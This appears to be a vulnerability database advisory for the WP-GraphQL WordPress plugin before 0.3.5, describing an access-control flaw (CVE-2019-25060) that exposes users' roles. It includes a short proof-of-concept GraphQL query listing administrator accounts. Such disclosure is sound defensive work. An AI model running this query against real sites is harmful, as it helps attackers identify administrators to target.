WordPress Plugin Vulnerabilities

WP-GraphQL < 0.3.5 - Improper Access Control

Description

The plugin doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.

Proof of Concept

query getUsers{
  users(where:{role:ADMINISTRATOR}){
    edges{
      node{
        userId
        name
      }
    }
  }
}

Affects Plugins

Plugin icon
wp-graphql
Fixed in 0.3.5

References

CVE
CVE-2019-25060
URL
https://github.com/wp-graphql/wp-graphql/pull/900

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Rohan Pagey
Submitter
Rohan Pagey
Verified
Yes
WPVDB ID
393be73a-f8dc-462f-8670-f20ab89421fc

Timeline

Publicly Published
2019-07-10 (about 4 years ago)
Added
2022-05-02 (about 2 years ago)
Last Updated
2022-05-03 (about 2 years ago)

Other

Published
Title
Published
2021-03-23
Title
SecuPress < 2.0 - Unauthenticated Arbitrary IP Ban
Published
2020-09-05
Title
NextScripts: Social Networks Auto-Poster < 4.3.18 - Insufficient Privilege Validation
Published
2024-04-19
Title
VikBooking < 1.6.8 - Broken Access Control
Published
2021-05-26
Title
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Import
Published
2024-02-07
Title
Simple Page Access Restriction < 1.0.23 - Improper Access Control to Sensitive Information Exposure via REST API